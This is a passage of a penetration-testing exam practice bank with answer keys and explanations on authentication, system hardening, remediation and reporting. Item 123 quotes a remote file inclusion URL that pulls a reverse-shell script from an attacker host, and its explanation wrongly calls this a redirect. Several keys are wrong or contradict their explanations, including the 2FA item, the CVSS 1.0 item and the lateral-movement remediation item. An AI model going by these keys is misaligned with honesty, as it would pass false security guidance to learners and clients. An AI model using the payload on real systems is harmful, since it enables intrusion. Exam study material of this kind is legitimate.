D.Switch to a hosted solution with a cloud service provider.
B.Rewrite the application to encrypt passwords before they are saved in the database.
Explanation:
Because the application was developed in-house, the client should be able to rewrite the code such that passwords are encrypted by the application before they are saved in the database.
70
You have just concluded a penetration test for a client. In your findings, you report that, while users are trained to change their passwords every 45 days, few of them actually do it because there is no mechanism in place to enforce this policy. Given that the client users Linux desktops and servers, which of the following Linux commands should you recommend they use to automatically lock user accounts if users don’t change their passwords after 45 days?
A.chage
B.chmod
C.chgroup
D.chown
A.chage
Explanation:
The chage command can be used on Linux systems to configure password aging for user accounts. For example, it can be used to lock a user account if the user doesn’t change their password after a certain number of days.
71
Which of the following tools can be used to restore the original plain text password from the hash of that password?
A.proxychains
B.John the Ripper
C.A rainbow table
D.TheHarvester
C.A rainbow table
Explanation:
A rainbow table is a precomputed table of hash values that can be used to reverse hash functions. For example, if a plaintext password has been protected by hashing it, you may be able to use a rainbow table to reverse the hashing function and expose the original plaintext password.
72
Which of the following is commonly used to prevent precomputation attacks on hashed passwords by adding random bits to the hashing operation?
A.Salting
B.Reversing the hash
C.Using OTP
D.Implementing multifactor authentication
A.Salting
Explanation:
Salting the hash involves adding extra, random data to a hashing operation. This mechanism is commonly used to protect hashed passwords from being reverse-hashed (which would expose the plain text password).
73
Which of the following is commonly used to prevent precomputation attacks on hashed passwords by running the value to be hashed through the hash function multiple times?
A.Salting
B.Key stretching
C.Symmetric encryption
D.Asymmetric encryption
B.Key stretching
Explanation:
Key stretching involves running the value to be hashed through the hash function multiple times. This increases the computation time required to hash each password, but it also dramatically increases the size of rainbow table needed for a precomputation attack to work.
74
You have just concluded a penetration test for a client. In your findings, you report that users are required to provide a username and a password to authenticate. You recommend that the organization implement multifactor authentication. Which of the following could they require users to supply when authenticating to accomplish this?
A.PIN.
B.Passphrase.
C.Fingerprint scan.
D.None of the above. Multifactor authentication is already in place by requiring a username and a password.
C.Fingerprint scan.
Explanation:
A username and a password are both examples of something you know and therefore do not constitute multifactor authentication. A fingerprint scan is an example of something you are. Requiring a fingerprint scan would improve the security of the system because authentication factors from multiple categories would be required for users to log on.
75
In terms of multifactor authentication, which of the following is an example of something you know?
A.PIN
B.One-time password (OTP)
C.Biometric scan
D.RSA token
A.PIN
Explanation:
A PIN is an example of something you know.
76
In terms of multifactor authentication, which of the following is an example of something you are?
A.Password
B.Challenge-response questions
C.Retina scan
D.Hardwire connection to the organization’s internal LAN
C.Retina scan
Explanation:
A retina scan is an example of something you are. Theoretically, no two people should have identical attributes for this type of factor.
77
In terms of multifactor authentication, which of the following is an example of somewhere you are?
A.Security token generator
B.Passphrase
C.Hardwire connection to the organization’s internal LAN
D.Voiceprint
C.Hardwire connection to the organization’s internal LAN
Explanation:
A hardwire connection to an organization’s internal LAN is an example of somewhere you are. Authentication may or may not be allowed based on this factor.
78
In terms of multifactor authentication, which of the following is an example of somewhere you are?
A.RFID proximity reader
B.USB token generator
C.Disconnected token generator
D.Password
A.RFID proximity reader
Explanation:
An RFID proximity reader can be used to prevent a user from authenticating to a system unless they are physically present at the system.
79
Which of the following is an example of multifactor authentication?
A.Username + PIN
B.RFID proximity reader + hardware connection to the LAN
C.Biometric scan + PIN
D.Password + challenge/response question
C.Biometric scan + PIN
Explanation:
Requiring a user to supply a biometric scan (something you are) along with a PIN (something you know) constitutes multifactor authentication.
80
Which of the following is an example of multifactor authentication?
A.Username + password
B.password + security token generator
C.USB token generator + disconnected token generator
D.Password + PIN
B.password + security token generator
Explanation:
Requiring a user to supply a password (something you know) plus a security token generator (something you have) constitutes multifactor authentication.
81
Which of the following is an example of two-factor authentication (2FA)?
A.Username + password
B.Username + PIN
C.Username + PIN + facial recognition scan
D.PIN + fingerprint scan + security token
D.PIN + fingerprint scan + security token
Explanation:
Two-factor authentication (2FA) requires users to supply factors from two different categories. In this case, requiring a user to supply a username (something you know), a PIN (something you know), and a facial recognition scan (something you are) constitutes 2FA authentication.
82
Which of the following is an example of three-factor authentication (3FA)?
A.Username + password + security token
B.Username + PIN + fingerprint scan + one-time password (OTP)
C.Username + PIN + facial recognition scan D.Password + PIN + security token
B.Username + PIN + fingerprint scan + one-time password (OTP)
Explanation:
Three-factor authentication (3FA) requires users to supply factors from three different categories. In this case, requiring a user to supply a username (something you know), a PIN (something you know), a fingerprint scan (something you are), and a one-time password (something you have) constitutes 3FA authentication.
83
You have just concluded a penetration test for a client. In your findings, you report that a web application that was developed in-house and that the organization uses to manage customer orders is susceptible to SQL injection attacks. What should you recommend the client do to remediate this?
A.Rewrite the code to sanitize user input.
B.Hash all data before transmitting it on the network. C.Encrypt all data at rest in the database.
D.Replace the application with a commercial application that performs a similar function.
A.Rewrite the code to sanitize user input.
Explanation:
In this scenario, you could recommend that the application be rewritten such that all user inputs are sanitized before being submitted to the backend database. For example, suppose the application contains a field where users are supposed to enter their phone number. The programmers could validate that the information entered contains only numbers (and only the correct number for a phone number). This prevents malicious attackers from submitting SQL statements into these fields that could potentially expose the information in the database.
84
You have just concluded a penetration test for a client. In your findings, you report that a web application that was developed in-house and that the organization uses to manage customer orders is susceptible to SQL injection attacks. What should you recommend the client do to remediate this?
A.Escape data.
B.Implement SSL for network communications. C.Require 2FA when authenticating users.
D.Salt the hash.
A.Escape data.
Explanation:
In this scenario, you could recommend that the application be rewritten such that data is escaped. Escaping is the process of securing data by stripping out unwanted information, such as malformed HTML or script tags. This prevents data from being seen as code. Escaping data helps secure information prior to rendering it for the end user and helps prevent SQL injection as well as cross-site scripting attacks.
85
Which defense against SQL injection attacks involves using prepared SQL statements with bounded variables?
A.Sanitizing user input
B.Escaping data
C.Parameterizing queries
D.Key stretching
C.Parameterizing queries
Explanation:
Using parameterized queries is typically considered a better defense against SQL injection attacks than sanitizing user input. With parameterized queries, prepared statements are used with bounded variables to access the SQL database.
86
You have just concluded a penetration test for a client. In your findings, you report that a Linux web server in the data center has the Apache web server, MySQL database, DNS, CUPS, DHCP, IMAP, and POP3 services running. What should you recommend the client do to remediate this situation?
A.Uninstall all unnecessary services from the server. B.Close the ports in the server’s host-based firewall associated with unnecessary services.
C.Uninstall the DNS and DHCP services.
D.Uninstall the email-related services.
A.Uninstall all unnecessary services from the server.
Explanation:
Every network service enabled on a server expands that server’s attack surface. Therefore, only those services that are actually needed should be installed. In this scenario, a web server probably doesn’t need DNS, DHCP, printing, or email services running. These should be removed.
87
A Windows server is functioning as an Active Directory domain controller for an organization’s network. Which of the following services are not required for it to fulfill this role? (Choose two.)
A.Group Policy Management
B.Hyper-V
C.Role Administration Tools
D.Active Directory Federation Services
B.Hyper-V
D.Active Directory Federation Services
Explanation:
Every network service enabled on a server expands that server’s attack surface. Therefore, only those services that are actually needed should be installed. In this scenario, the domain controller shouldn’t be running Hyper-V, which is used for virtualization. Likewise, Federation Services is used only in situations where one Active Directory domain is linked to (“federated”) with a different Active Directory domain.
88
Which of the following are common methods used to harden user accounts on a Windows-based computer system? (Choose two.)
A.Use Group Policy to configure account lockout. B.Enable anonymous SID/name translation.
C.Enable the built-in Guest user account.
D.Enable anonymous enumeration of SAM accounts and shares.
E.Delete or disable all unused user accounts.
A.Use Group Policy to configure account lockout.
E.Delete or disable all unused user accounts.
Explanation:
To harden user accounts on Windows-based computer systems, you should use Group Policy to configure account lockout. This will help slow down or even prevent brute-force or password guessing attacks. You should also immediately disable or delete all unused user accounts.
89
Which of the following are common methods used to harden user accounts on a Windows-based computer system? (Choose two.)
A.Require users to authenticate using online.Microsoft user accounts.
B.Use Group Policy to enforce password complexity requirements.
C.Allow “everyone” permissions to apply to anonymous users.
D.Use Group Policy to enforce password aging requirements.
E.Allow standard users to install updates
B.Use Group Policy to enforce password complexity requirements.
D.Use Group Policy to enforce password aging requirements.
Explanation:
To harden user accounts on a Windows-based computer system, you should use Group Policy to enforce password complexity requirements. For example, you could require a certain password length and that it contain specific character combinations. You should also use Group Policy to enforce password aging requirements. This requires users to change their passwords on a regular basis.
90
Which of the following methods is commonly used to harden network communications on Windows-based computer systems?
A.Enable NetBIOS over TCP/IP.
B.Allow anonymous access to shared folders.
C.Store LAN Manager hash values.
D.Set the LAN Manager authentication level to allow LM and NTLM.
E.Restrict network access to only authenticated users.
E.Restrict network access to only authenticated users.
Explanation:
To harden network communications on a Windows-based computer system, you should restrict access to the computer over the network access to only authenticated users.
91
Which of the following methods is commonly used to harden network communications on Windows-based computer systems?
A.Close all ports in the Windows firewall and then open only those needed by installed services.
B.Open all ports in the Windows firewall and then close them one by one except for those needed by installed services.
C.Enable LMShosts lookup.
D.Enable the Windows firewall in only the public network profile.
A.Close all ports in the Windows firewall and then open only those needed by installed services.
Explanation:
To harden network communications on a Windows-based computer system, you should configure the Windows firewall properly. First, you should close all ports to ensure that nothing is accidentally left open. Then open ports for only those services that have been installed and are needed on the system.
92
Which of the following methods are commonly used to harden Windows-based computer systems? (Choose two.)
A.Install extra system RAM and then disable the Windows paging file.
B.Grant the Administrator user the “act as part of the operating system” right.
C.Disable unneeded services.
D.Allow anonymous access to the registry.
E.Disable automatic notification of patch availability.
A.Install extra system RAM and then disable the Windows paging file.
C.Disable unneeded services.
Explanation:
To harden a Windows-based computer system, you should consider installing extra system RAM and then disable the Windows paging file. This prevents sensitive data that is supposed to be stored only in unencrypted format in RAM from being written to the hard disk page file. You should also disable any unneeded services.
93
Which of the following methods is commonly used to harden Windows-based computer systems?
A.Disable Ctrl+Alt+Del for interactive logons.
B.Install all available Windows components.
C.Disable BitLocker, if it is enabled.
D.Disable autorun.
D.Disable autorun.
Explanation:
To harden a Windows-based computer system, you should disable autorun. This helps prevent malware from being installed on the system when an infected optical disc or USB drive is inserted into the system.
94
Which of the following methods is commonly used to harden Linux-based server systems?
A.Enable and configure iptables.
B.Enable Ctrl+Alt+Del in inittab.
C.Grant all users read-write access to the /boot directory.
D.Configure the IP protocol to respond to ICMP requests.
A.Enable and configure iptables.
Explanation:
To harden a Linux-based server system, you should make sure a host-based firewall is running by enabling and configuring iptables. You should first close all network ports in the firewall and then open only those required by specific services running on the system.
95
Which of the following methods is commonly used to harden Linux-based server systems?
A.Enable the Telnet service.
B.Enable the secure shell (SSH) service.
C.Configure the IP protocol to respond to network broadcasts.
D.Enable user accounts with empty passwords.
B.Enable the secure shell (SSH) service.
Explanation:
To harden a Linux-based server system, you should make sure you use SSH instead of Telnet for remote access to the system.
SSH encrypts all network traffic between the SSH server and the SSH client.
Telnet, on the other hand, transmits all data as clear text, including authentication credentials
96
You have just concluded a penetration test for a client. In your findings, you report that a Linux database server has a large number of unnecessary open services, increasing its attack surface. In your final report, you recommend that the client analyze the system and remove any applications or services that aren’t required for its role. Which tool should you suggest they use to check for listening network ports on the server?
A.netstat
B.yum
C.chage
D.iptables
A.netstat
Explanation:
To harden a server system, you should make sure only the services and applications necessary for its role are installed. The netstat command can be used to check for listening network ports on the system. This will reveal which services are running on the system.
97
You have just concluded a penetration test for a client. In your findings, you report that you found several user accounts on a Linux file server that have no password assigned to them. In your final report, you recommend that the client analyze the system and assign passwords to all user accounts. Which file on the server should they review to accomplish this?
A./etc/passwd
B./etc/shadow
C/etc/group
D./etc/gshadow
B./etc/shadow
Explanation:
To harden a server system, you should make sure all user accounts have a password assigned to them. One way to do this is to review the /etc/shadow file and look for any accounts that don’t have a password assigned.
98
You have just concluded a penetration test for a client that uses a large number of temporary workers and contractors. In your findings, you report that temporary and contract user accounts are frequently not deactivated or removed when their work is complete because they frequently come back to work on new projects several months later. Given that the client uses Linux desktops and servers, which of the following Linux commands should you recommend they use to manually lock temporary or contract user accounts until the worker returns for a new project?
A.lockusr
B.chmod
C.chage
D.passwd
D.passwd
Explanation:
To harden a server system, you should make sure all stale user accounts are disabled or deleted. In this scenario, the client doesn’t want to delete the accounts because the temporary or contract users may be coming back in the future. To lock an account manually, you can use the passwd –l command followed by the name of the user.
99
You have just concluded a penetration test for a client. In your findings, you report that a Linux database server shows evidence of having been compromised in the past. The attacker tried to cover his or her tracks by manually modifying the local log files but missed one key entry that revealed the compromise. What should you recommend the client do?
A.Make the log files read-only.
B.Grant only the root user read-write access to the log files.
C.Reconfigure the system to send log entries to a dedicated log server.
D.Make the log files hidden files.
C.Reconfigure the system to send log entries to a dedicated log server.
Explanation:
One way to harden a server system is to reconfigure it to save its log entries to a dedicated logging server somewhere else on the network. This makes it harder for an attacker to cover his or her tracks after a compromise because the log files aren’t stored locally.
100
You have just concluded a penetration test for a client that has many remote sites. Employees at the remote sites commonly use an FTP client to copy files back and forth between their site and the home office servers. During the test, you were able to sniff these FTP sessions and capture sensitive information. In your final report, what should you recommend the client do to remediate this issue?
A.Use FTPS for file transfers.
B.Prohibit file transfers between sites.
C.Use the rcp command for file transfers.
D.Use flash drives and a courier service for file transfers between sites.
A.Use FTPS for file transfers.
Explanation:
The FTP protocol does not encrypt data transfers between systems. This means authentication information as well as the data itself are exposed during transmission over the network. To remedy this, you should recommend that the client switch to FTPS instead of FTP. The FTPS protocol uses SSL or TLS to encrypt an FTP session since they encrypt data.
101
You have just concluded a penetration test for a client. During the test, you discovered that one of the Linux system administrators uses Telnet to remotely access Linux servers. In your final report, what should you recommend the client do to remediate this issue?
A.Prohibit remote server access.
B.Use SFTP for remote server access.
C.Use rsh for remote server access.
D.Use SSH for remote server access.
D.Use SSH for remote server access.
Explanation:
The Telnet protocol does not use encryption to protect network transmissions, which means authentication credentials to the remote system as well as the data being transferred are sent as plain text. To remedy this, you should recommend that the client use the Secure Shell (SSH) server and client for remote server access. SSH encrypts authentication information as well as data transfers between systems.
102
You have just concluded a penetration test for a client. During the test, you discovered that one of Linux system administrators uses rcp to copy files between Linux servers. In your final report, what should you recommend the client do to remediate this issue?
A.Use the scp command for file transfers.
B.Prohibit file transfers between servers.
C.Use the rsh command for file transfers.
D.Use the ftp command for file transfers.
A.Use the scp command for file transfers.
Explanation:
The rcp utility does not use encryption to protect network transmissions, which means authentication credentials to the remote system as well as the data being transferred are sent as plain text. To remedy this, you should recommend that the client use the scp command to copy files between servers. The scp utility is part of the SSH suite of utilities, which encrypts authentication information as well as data transfers between systems.
103
You have just concluded a gray box penetration test for a client. During the test, you were able to access the organization’s wireless network controller device using a default administrator username and password. In your final report, what should you recommend the client do to remediate this issue?
A.Eliminate the transmission of plain text passwords by using SSH for remote connections.
B.Change the default administrative username and password on the controller.
C.Use directional antennae on all access points.
D.Implement MAC address filtering on the wireless network.
B.Change the default administrative username and password on the controller.
Explanation:
In this scenario, the wireless network can be hardened by changing the default administrative username and password on the wireless controller. Lists of default usernames and passwords are readily available on the Internet and should not be used.
104
You have just concluded a black box penetration test for a client. The organization’s wireless network uses preshared keys. During the test, you were able to access the organization wireless network from the parking lot using your laptop running Aircrack-ng. In your final report, what should you recommend the client do to remediate this issue? (Choose two.)
A.Implement MAC address filtering.
B.Implement 802.1x authentication.
C.Upgrade to newer Wi-Fi equipment that supports modern encryption methods.
D.Change the default administrative username and password on the access point.
E.Reconfigure the Wi-Fi equipment to use WPA encryption.
A.Implement MAC address filtering.
B.Implement 802.1x authentication.
Explanation:
In this scenario, the wireless network can be hardened by implementing MAC address filtering. This provides a basic layer of protection by preventing unauthorized systems from connecting to the wireless network. However, MAC addresses are easy to spoof once a known-good address has been identified. So, the wireless network can be further hardened by implementing 802.1x authentication. This eliminates th weakness associated with preshared keys by implementing a separate authentication server (such as a RADIUS server).
105
You have just concluded a black box penetration test for a client. During the test, you were able to access the organization’s wireless network from the parking lot using your laptop running Aircrack-ng. In your final report, what should you recommend the client do to remediate this issue? (Choose two.)
A.Use directional antennae on all access points. B.Reconfigure the Wi-Fi equipment to use WEP encryption.
C.Upgrade to newer Wi-Fi equipment that supports modern encryption methods.
D.Disable DHCP on the wireless network.
A.Use directional antennae on all access points.
D.Disable DHCP on the wireless network.
Explanation:
In this scenario, the wireless network can be hardened by using directional access points. This will help prevent the signal from emanating into the parking lot. In addition, DHCP should be disabled on the wireless network. While this makes administration much more difficult, it also prevents attackers who compromise the wireless network from automatically receiving all the configuration information they need to access network resources.
106
You have just concluded a penetration test for a client. During the test, you were able to gain access to the server room by masquerading as a technician from an IT vendor. You were able to plug your laptop into the serial connector on the organization’s Cisco router and access its configuration. In your final report, what should you recommend the client do to remediate this issue? (Choose two.)
A.Disable DHCP on the wired network.
B.Run the enable secret command on the router. C.Implement procedures to vet representatives from vendors.
D.Implement MAC address filtering on the router.
B.Run the enable secret command on the router. C.Implement procedures to vet representatives from vendors.
Explanation:
In this scenario, the router can be hardened by creating an encrypted password for privileged access. This is done using the enable secret command on the router. In addition, procedures should be set in place to vet visitors who claim to be representatives of IT vendors.
107
As you are conducting a penetration test for a client, you want to make sure the post-engagement cleanup process goes smoothly. What should you do to accomplish this?
A.Carefully document everything you do as you conduct the test.
B.Create back doors in critical systems so you can easily access them later.
C.Create images of all systems and devices so they can be restored to their pre-test state.
D.Erase any log entries created by your exploits.
A.Carefully document everything you do as you conduct the test.
Explanation:
After a penetration test, it is critical that you undo everything you have done. The best way to accomplish this is to carefully document everything you do as you conduct the test. That way, you will have a record of what must be restored and how it should look after the cleanup is complete.
108
You are conducting the post-engagement cleanup process after a penetration test is complete. What should you do? (Choose two.)
A.Remove any shell sessions created during the test.
B.Obscure everything you did during the test from the client.
C.Document everything you do during the cleanup.
D.Obscure everything you do to clean up after the test.
A.Remove any shell sessions created during the test.
C.Document everything you do during the cleanup.
Explanation:
After a penetration test, it is critical that you undo everything you have done. For example, if you set up any shell sessions, especially reverse shells, you need to make sure that they are removed. In addition, you should document everything you do as you clean up after the test. It’s always possible that you may inadvertently break something during the cleanup process. If this happens, having documentation of what you did will be invaluable.
109
You are conducting the post-engagement cleanup process after a penetration test is complete. What should you do?
A.Ask the client to sign an agreement not to disclose the techniques you used during the test.
B.Remove any tester-created credentials used during the test.
C.Write a critique of the mistakes the internal administrators made during the test.
D.Obscure everything you did during the test from the client.
B.Remove any tester-created credentials used during the test.
Explanation:
After a penetration test, it is critical that you undo everything you have done. For example, if you created any backdoor user accounts, you should make sure you remove those credentials. You should not leave these in place as they could be used by a real attacker to compromise the system later.
110
You are conducting the post-engagement cleanup process after a penetration test is complete. What should you do?
A.Remove any tools or utilities you installed during the test.
B.Reset all administrative credentials to their default values.
C.Reset all firewalls to the default configurations.
D.Reinstall all network services using default settings.
A.Remove any tools or utilities you installed during the test.
Explanation:
After a penetration test, it is critical that you undo everything you have done. For example, it is critical that you uninstall any tools or utilities you used to conduct exploits during the test.
111
You are meeting with your client after a penetration test is complete. During the meeting, you provide the client with detailed evidence related to the issues you discovered during the test. What is this process called?
A.Attestation of findings
B.Lessons learned
C.Client acceptance
D.Normalization of data
A.Attestation of findings
After a penetration test, it is critical that you communicate what happened and what was discovered to the client. During the attestation of findings process, you communicate detailed evidence of what you discovered to the client. The client can then use this information to remediate the problems found.
112
You are meeting with your client after a penetration test is complete. At the conclusion of the meeting, you ask the client to agree in writing that you have fulfilled your responsibilities according to the contract you initially signed with the client. What is this process called?
A.Attestation of findings
B.Lessons learned
C.Client acceptance
D.Follow-up actions
C.Client acceptance
Explanation:
After a penetration test is complete, it is common for the tester to ask the client to agree (usually in writing) that the tester has fulfilled the contract that was originally signed with the client. This process is called client acceptance
113
Several months after completing a penetration test, your client calls and asks you to come back and retest their network to verify that the problems you initially discovered have been properly remediated. What is this process called?
A.Attestation of findings
B.Lessons learned
C.Follow-up actions
D.Normalization of data
C.Follow-up actions
Explanation:
After a penetration test is complete, it is not uncommon for the client to ask the tester to come back and retest everything to make sure the problems discovered during the test have been remediated. This process is sometimes called follow-up actions
114
After completing a penetration test for a client, you meet with your penetration testing team to review lessons learned. What should you do in this meeting? (Choose two.)
A.Document technical exploits that were effective during the test.
B.Discuss the best places to eat near the client’s location.
C.Identify exploits that were not effective during the test.
D.Review your team’s plans for the upcoming holiday celebration.
A.Document technical exploits that were effective during the test.
C.Identify exploits that were not effective during the test.
Explanation:
After a penetration test is complete, you should meet with your teams and discuss lessons learned. You should identify what went well and what improvements need to be made. For example, you should discuss which exploits worked and which didn’t. You should document best practices for
using those exploits such that you don’t have to relearn them the next time you conduct a penetration test.
115
A detailed penetration report was given to a security analyst. The penetration was conducted against the target organization’s DMZ environment. The report had a finding that the Common Vulnerability Scoring System (CVSS) had a base score of 1.0. To exploit this vulnerability, which level of difficulty would be required?
A.Very difficult, because the perimeter systems are usually behind a firewall
B.Somewhat difficult, because it would require powerful processing to exploit
C.Trivial, because little effort would be required to exploit the findings
D.Impossible, because the external hosts are hardened to protect against attacks
C.Trivial, because little effort would be required to exploit the findings
Explanation:
The Common Vulnerability Scoring System (CVSS) is an industry standard for assessing the severity of security vulnerabilities. It provides a technique for scoring each vulnerability on a variety of measures. Security analysts often use CVSS ratings to prioritize response actions. Each measure is given a descriptive rating and a numeric score.
116
During the course of a penetration test, the tester needs to communicate with a client. Which of the following situations would cause this communication to occur? (Choose two.)
A.Following an attempted test, the system becomes unavailable.
B.The system shows an indication of prior unauthorized access.
C.The system shows a lack of complete hardening.
D.The tester discovered individually identifiable data on the system.
E.The tester discovers something that is on an out-of-scope system.
A.Following an attempted test, the system becomes unavailable.
B.The system shows an indication of prior unauthorized access.
Explanation:
These may be times that call for immediate communication to the client. The following are some common penetration testing communication triggers. Communication triggers should be done upon the completion of the testing phase, a discovery of a critical finding, or the discovery of indicators of a previous compromise. In this scenario, we would want to contact the client if the system becomes unavailable following an attempted test and if the system shows an indication of prior unauthorized access.
117
A penetration tester has performed a security assessment for a client. The report lists a total of nine vulnerabilities, with four of those determined to be critical. The client does not have the budget to immediately correct all of the vulnerabilities. What should the tester suggest is the best option for the client given these circumstances?
A.Apply easy compensating controls for the critical vulnerabilities to minimize risk and then reprioritize remediation.
B.Identify the vulnerabilities that can be remediated quickest and address them first.
C.Implement the least impactful of the critical vulnerability remediation first and then address other critical vulnerabilities.
D.Correct the most critical vulnerability first, even if it means that fixing the other vulnerabilities may take longer to correct.
D.Correct the most critical vulnerability first, even if it means that fixing the other vulnerabilities may take longer to correct.
Explanation:
In this scenario, the client does not have the budget to immediately correct all of the vulnerabilities found. In this case, the best suggestion to tell the client is to correct the most critical vulnerability first and, then when funds become available, fix the other critical vulnerabilities.
118
A penetration tester has performed a security assessment for a client. It is observed that there are several high-numbered ports listening in on a public web server. The client indicates that they are only using port 443 for an application. What should the tester recommend to the client?
A.Disable the unneeded services.
B.Filter port 443 to specific IP addresses.
C.Implement a web application firewall.
D.Transition the application to another port.
A.Disable the unneeded services.
Explanation:
In this scenario, since there are several high-numbered ports listening on a public web server. The best recommendation would be to disable unneeded services since the client only uses post 443. The unnecessary services can pose a security risk because they increase the attack surface, providing a potential attacker with additional ways to try to exploit the system.
119
What is the best recommendation to give to a client to mitigate a vulnerability if a penetration tester was able to enter a SQL injection command into a text box and gain access to the information stored on the database?
A.Implement input normalization.
B.Install host-based intrusion detection.
C.Perform system hardening.
D.Randomize the credentials used to log in.
C.Perform system hardening.
Explanation:
System hardening, also known as operating system hardening, helps minimize security vulnerabilities. The purpose of system hardening is to get rid of as many security risks as possible. This is usually done by removing all nonessential software programs and utilities from the computer. The goal of systems hardening by removing unused programs, accounts functions, applications, ports, permissions, access, etc., is that attackers have fewer opportunities to gain access to your network. There are several types of system hardening activities. They include the following:
Application hardening Operating system hardening Server hardening Database hardening Network hardening
120
A penetration tester is conducting a test, and after compromising a single workstation, the tester is able to maneuver laterally throughout the domain with very few roadblocks. Which migration strategies should be recommended for the report to the client? (Choose three.)
A.Apply additional network access control.
B.For all logons, require multifactor authentication. C.For each machine, randomize local administrator credentials.
D.For local administrators, disable remote logons. E.Increase minimum password complexity requirements.
F.Put each host into its own virtual local area network (VLAN).
G.On every workstation, enable full-disk encryption.
B.For all logons, require multifactor authentication.
E.Increase minimum password complexity requirements.
G.On every workstation, enable full-disk encryption.
Explanation:
In this situation, since the tester was able to compromise a single workstation and is able to move laterally through the network, the best recommendations to give the client would be the following: Use multifactor authentication. Multifactor authentication (MFA) is an authentication method in which a computer user is granted access only after successfully presenting two or more pieces of evidence (or factors) to an authentication mechanism. Increase minimum password complexity. Complex passwords use different types of characters in unique ways to increase security, making it harder for an attacker to crack. Enable full-disk encryption. Full-disk encryption (FDE) is encryption at the hardware level. FDE works by automatically converting data on a hard drive into a form that cannot be understood by anyone who doesn’t have the key to “undo” the conversion.
121
A penetration tester is writing a report that outlines the overall level of risk to operations. In which part of the report should the tester include this information?
A.Appendixes
B.Executive summary
C.Main body
D.Technical summary
B.Executive summary
Explanation:
In this scenario, the question states that the penetration tester is writing a report “that outlines the overall level of risk.” Given this statement, the tester will be including this information in the executive summary. The executive summary is the most important section of the report. It should be written in a manner that conveys all of the important conclusions of the report in a clear manner that is written in “layman’s terms.” A tester should explain what was discovered in plain language and describe the risks to the business in terms that the client will understand.
122
During penetration testing of a client’s core server, a tester discovers a critical vulnerability. What should the tester do next?
A.Finish testing, complete all findings, and then submit them to the client.
B.Immediately alert the client with details of the findings.
C.On the target machine, disable the network port of the affected service.
D.Take the target machine offline so it cannot be exploited.
B.Immediately alert the client with details of the findings.
Explanation:
In this scenario, since the penetration tester discovered a critical vulnerability, the tester should immediately alert the client with the details of the findings.
123
A security analyst is monitoring the Web Application Firewall (WAF) logs and has discovered that there was a successful attack against the following URL: https://sample.com/index.php?Phone=http://iattackedyou.com/stuffhappens/revshell.php. What remediation steps should be taken to prevent this type of attack from happening again?
A/Block URL redirections.
B.Double URL encode the parameters.
C.From the application, stop external calls.
D.Implement a blacklist.
A/Block URL redirections.
Explanation:
In this scenario, the attacker was using a redirect. The security analyst should block URL redirections. A URL redirect is a web server function that sends a user from one URL to another. Redirects commonly take the form of an automated redirect that uses one of a series of status codes defined within the HTTP protocol. So, when a web browser attempts to open a URL that has been redirected, a page with a different URL is opened.
124
By using phishing, a penetration tester was able to retrieve the initial VPN user domain credentials from a member of the IT department. Then the tester obtained hashes over the VPN and effortlessly cracked them by using a dictionary attack. The tester should recommend which of the following remediation steps to the client? (Choose three.)
A.Recommend increased password complexity requirements.
B.Recommend implementing two-factor authentication for remote access.
C.Recommend installing an intrusion prevention system.
D.Recommend installing a security information event monitoring solution.
E.Recommend preventing members of the IT department from interactively logging in as administrators.
F.Recommend requiring that all employees take security awareness training.
G.Recommend upgrading the cipher suite used for the VPN solution.
A.Recommend increased password complexity requirements.
F.Recommend requiring that all employees take security awareness training.
G.Recommend upgrading the cipher suite used for the VPN solution.
Explanation:
In this scenario, the tester should recommend that the client increase their password complexity requirements since the tester was able to crack them by using a dictionary attack. The tester should also recommend that all employees take security awareness training, since it was a member of the IT department who gave up pertinent information when the tester used a phishing technique. The tester should also recommend upgrading the cipher suite that is used for the VPN solution. A cipher suite is a set of algorithms that help secure network connections that uses Transport Layer Security (TLS) or Secure Socket Layer (SSL). The set of algorithms that cipher suites usually contain includes a key exchange algorithm, a bulk encryption algorithm, and a message authentication code (MAC) algorithm.
125
Upon completing testing on an Internet-facing application, the penetration tester notices that the application is using only basic authentication. What is the best remediation strategy that the tester should recommend to the client?
A.Enable HTTP Strict Transport Security (HSTS) B.Enable a secure cookie flag
C.Encrypt the communication channel
D.Sanitize invalid user input
A.Enable HTTP Strict Transport Security (HSTS)
Explanation:
In this scenario, the tester should recommend that the client enable HTTP Strict Transport Security (HSTS). The HSTS response header lets a website tell browsers that it should only be accessed using HTTPS, instead of using HTTP. It is an opt-in security enhancement that is specified by a web application through the use of a special response header. Once a supported browser receives this header, that browser will prevent any communications from being sent over HTTP to the specified domain and will instead send all communications over HTTPS.
126
Once the completion of testing is done for a client, the tester is prioritizing the findings and recommendations for an executive summary. Which one of the following considerations would be the most beneficial to the client?
A.The availability of patches and other remediations
B.The levels of difficulty to exploit the identified vulnerabilities
C.The risk tolerance of the client’s organization
D.The time it took to accomplish each step
C.The risk tolerance of the client’s organization
Explanation:
In this scenario, it would be important to put the risk tolerance of the client’s organization into the executive summary. Risk tolerance is basically how much risk an organization is willing to take on where their investments are concerned. With any type of investment, there is always risk, but how much risk one is able to withstand is their risk tolerance. This may be different for every organization. You cannot put a set value on risk tolerance.
127
A junior technician in an organization’s IT department runs a penetration test on a corporate web application. During testing, the technician discovers that the application can disclose a SQL table with all user account and password information. How should the technician notify management?
A.The technician should connect to the SQL server using this information and change the passwords of a few noncritical accounts to demonstrate a proof of concept to management.
B.The technician should document the findings using an executive summary including recommendations and screenshots to provide to management.
C.The technician should notify the development team of the discovery and suggest that input validation be enforced on the web application’s SQL query strings. D.The technician should request that management create a request for proposal (RFP) to begin a formal engagement with a professional penetration testing company.
D.The technician should request that management create a request for proposal (RFP) to begin a formal engagement with a professional penetration testing company.
Explanation:
In this scenario, since the testing was performed by an on-staff junior administrator, it may be in the company’s best interest to create a request for proposal (RFP) from a professional penetration testing company to agree with the assessments and to give the company any vulnerability findings. An RFP is a document that solicits proposal, often made through a bidding process.
128
You are a security analyst, and you are reviewing the results of a recent internal vulnerability scan that was performed against intranet services. The scan reports indicated that there was a critical vulnerability. The report indicated the following:
Title: Remote Command Execution vulnerability in web server
Rating: Critical (CVSS 10.0)
Threat actor: any remote user of the web server
Confidence: certain
Recommendation: apply vendor patches
What should you do first?
A.Apply a risk rating and how it affects the organization.
B.Exploit the server to determine whether the scan indicated a false positive.
C.Inform senior management about the vulnerability. D.Organize for critical out-of-cycle patching.
A.Apply a risk rating and how it affects the organization.
Explanation:
In this scenario, it asks what the security analyst should do first. Once the vulnerability has been identified, you need to rate the risk and how it affects your organization. The rating will determine whether it is safe enough to continue with the work or whether you need to adopt additional control measures to reduce or eliminate the risk. The rating depends upon the likelihood of an event occurring and the severity of the vulnerabilities. This is done by figuring out whether the likelihood is Low, Medium, or High and then doing the same for impact. The 0 to 9 scale is split into three parts: 0 to <3 is Low, 3 to <6 is Medium, and 6 to 9 is High.
129
